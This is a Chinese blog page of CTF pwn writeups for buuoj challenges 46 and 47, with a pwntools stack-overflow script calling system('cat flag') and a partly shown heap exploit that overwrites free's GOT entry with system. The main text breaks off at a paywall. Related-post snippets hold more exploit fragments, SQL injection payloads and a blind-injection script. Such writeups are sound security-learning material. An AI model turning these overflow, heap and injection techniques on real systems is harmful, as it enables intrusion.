buuoj Pwn writeup 46-50

最新推荐文章于 2022-01-04 12:50:23 发布
原创 最新推荐文章于 2022-01-04 12:50:23 发布 · 263 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

博客内容涉及多种信息安全技术,包括缓冲区溢出、堆管理漏洞利用和系统调用。通过示例代码展示了如何利用栈溢出和堆漏洞来控制系统执行,如修改函数指针、利用UAF(Use-After-Free)进行内存篡改,以及通过命令注入执行系统命令。此外,还提到了逆向工程在分析程序行为中的作用。

46 jarvisoj_test_your_memory

保护
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述这个地方有个溢出。

在这里插入图片描述在这里插入图片描述
后门函数,cat flag都有,就直接一把梭。

from pwn import*

r = process('./46')

system_addr = 0x08048440

cat_flag = 0x080487E0

payload='A'*0x17 + p32(system_addr) + p32(cat_flag) + p32(cat_flag)

r.sendline(payload)

r.interactive()

47 babyfengshui_33c3_2016

保护
在这里插入图片描述在这里插入图片描述一看就知道是个堆。逻辑复杂。

add
在这里插入图片描述堆题首先就是要把它的结构分析清楚。
在这里插入图片描述delete
在这里插入图片描述指针就清空了一个,所以是有uaf的。

display
在这里插入图片描述输出函数平平无奇。

update
在这里插入图片描述又是菜单题 这非常的pwn
这种函数逐渐的引起了我的注意
所以这是个啥意思?
if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1] - 4 )

它其实是不想让我们像前面那道题一样一上来直接unlink,从而控制它的这个数组,也不能堆溢出。

但是其实你仔细研究一下的话会发现这个检查机制很初级,有问题,它只能检测内存分配的时候description的chunk与ptr指向的chunk不会发生溢出。

这个检查问题就出在它默认des一定在node上面而且贴在一起,但是呢,我们最后的结果就是构造了一种情况,des在node上面,但是不是贴在一起的,这就造成了能往中间写东西。

第一个图是申请了三个note,内存是这样的
上面所有大小都是0x80

将第一个node释放掉, 然后上面会空出来0x100大小的空间,然后再写一个0x100大小的des,就会有图二的结果。

然后des2到nod2都是可以写的,就蟹盖free的got表,改成sys,然后在des2里面写入/bin/sh,然后free2就行了

在这里插入图片描述

from pwn import *

context(arch='amd64', os='linux',log_level='debug')
context.terminal=['tmux','splitw','-h']
p = process('./47')
libc = ELF("/glibc/2.19/32/lib/libc-2.19.so")
elf=ELF("./babyfengshui")

def add(deslen,txtlen,text):
    p.sendlineafter("Action: ",str(0))
    p.sendlineafter(
最低0.47元/天 解锁文章
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 406
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj Pwn writeup 201-205
yongbaoii的博客
08-31 586
201 bbctf_2020_write canary是没有开的。环境是2.27的一个环境。 可以看到首先进去会给一个puts的地址,然后我们就可以获得libc的基地址。 又给出了一个栈地址,我们考虑可以直接去劫持got表,但是发现got表不能写。 那我们去考虑劫持main函数返回地址,但是又发现最后用exit去结束的。 exit没有hook,我们考虑怎么能把exit劫持掉。 劫持exit 简单点说就是。 exit()->__run_exit_handlers->_dl_fini->_
BUUOJ
zbbjya的博客
01-04 162
点击我们会看到网址栏哪里有一个/?file=flag.php 说明flag就在PHP的文件当中而现在我们没有看见flag 我们可以用、 页面跳转 变化了 然后你就会得到这样的数据 这样就会得到flag了
BUUOJ Fakebook
沐目的博客
10-22 640
关于源码泄露,我是真的懂的不多,而且刚开始发现有SQL注入,我以为就没了,但最后发现根本不是。 1.源码泄露 这题的关键点,就是找到源码,而找源码,就需要有好的工具(nikto)。存在robots.txt文件,里面有源码的路径。而再用御剑,发现falg.php文件。啥时候可以有一个完美的扫描工具。这还得扫两遍,谁能想的到! <?php class UserInfo { public...
buuoj-相册
bunner_的博客
01-17 390
解题 拿到手解压后是一个apk文件,扔到 jeb 中 根据题目提示,拿到完整邮箱即可,以及查看cn包下的文件名,用字符串搜索mail 【ctrl+F】 从上图中可以发现一个名为sendMailByJavaMail的函数,用快捷键q来看看源码 从上图发现v1.set_to(new String[](arg6)),该代码意为将arg6设置为邮件接收者,所以我们需要寻找调用该函数的代码【右键该函数,单击Cross references】 进入MainTask查看 发现第一个参数为C2.MAILSE
BUUOJ[FlareOn4]IgniteMe
阿東啊、
12-07 527
[FlareOn4]IgniteMe
buuoj-随便注
读万卷书,行万里路。
01-22 1022
随便注 首先,使用 1'进行测试,判断是否存在 SQL 注入。从返回的结果可以看出,可能存在 SQL 注入 使用 1'可以将 SQL 语句构造成 select * from table where id='1'' limit 0,1。不符合 SQL 语句,所以会导致报错。 使用截断语句 1' #进行截断处理,使得后面的限制语句失效(limit或者其他)。1’ #,而不是1 # 类似的截断语句还...
buuoj Pwn writeup 71-75
yongbaoii的博客
02-23 383
71 hitcontraining_heapcreator 保护 菜单 create edit show delete 72 [V&N2020 公开赛]babybabypwn 保护 这一堆东西,加了沙箱。 程序也是稀奇古怪。 先给了puts的地址。 syscall参数是15的话时调用的sigreturn。 平常我们是先调用signal,再调用sigreturn。 但是这个里面我们是直接调用的sigreturn,所以会把buf里面的东西返回成寄存器的状态。 因为禁用了execve,所以我们
buuoj Pwn writeup 161-165
yongbaoii的博客
05-30 457
161 picoctf_2018_echooo 就是格式化字符串 flag被读到了栈上,直接泄露就行。 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" r = remote('node3.buuoj.cn',25088) offset=11 flag='' for i in range(27,27+11): payload='%{}$p'.format(str(i)) r.sendlin
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 613
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj--sqlilabs
weixin_30270815的博客
03-21 942
CTF欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑
buuoj [网鼎杯 2020 青龙组] AreUSerialz
会下雪的晴天
09-23 517
复现地址:https://buuoj.cn/ 拖了这么久才看网鼎杯。。这就是菜的原因吧 目录[网鼎杯 2020 青龙组]AreUSerialz [网鼎杯 2020 青龙组]AreUSerialz 知识点:代码审计 打开就是代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protect.
【CTF日记】BUUOJ
CH3UHX9
03-11 845
[HCTF 2018]WarmUp 题目介绍 这道题来自BUUCTF,传送门。 涉及的知识点包括: PHP代码审计 远程文件包含 题目代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
buuoj pwn
FFY's Blog
10-07 1201
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
buuoj [极客大挑战 2019]LoveSQL
pondzhang的专栏
04-03 479
报错注入: http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select user()))) and '1&password=67df2765f3da545f03860281ef7f964d http:...
Buuoj CTF Day01
qq_30015381的博客
12-20 179
Buuoj CTF Day01
[BUUOJ][MRCTF2020]Ezpop
Y4tacker的博客
09-22 5332
文章目录代码审计阶段Modifier类Show类Test类构造pop链 代码审计阶段 按照步骤一步一步分析 Modifier类 首先第一个Modifier类 class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var);
buuoj-reserve刷题日记
Ching_jen的博客
08-08 403
reserve1 用ida打开文件,找了一下好像没有main函数,所以查看了一下字符串列表说不定可以发现什么 最下面这行看起来特别像flag,但是不是,所以又用文本框搜索了一下所有出现flag字符串的地方(这个可以显示出现的函数) 这里用出现一个“this is the right flag!”,点进去看一下这个函数 代码逻辑大概是将输入的字符存储在Str1中,然后将Str2中的内容与Str1相比较,如果相等的话就是正确的flag,说明Str2中存储的字符串是flag,点开查看,发现是我们原本输入的那
buuoj [极客大挑战 2019]FinalSQL
pondzhang的专栏
04-02 601
import requests #database length def get_database_length(): count = 0 while(1): url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database()...
PWN G21.5-0.9脉冲星云光谱分析结果发布
在天文学领域,脉冲星云(Pulsar Wind Nebula,简称PWN)是一种特别的天体现象,它是由高速旋转的脉冲星释放出的粒子风与周围介质相互作用形成的高能辐射云。脉冲星是中子星的一种,它们自转极快,能够周期性地发出...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值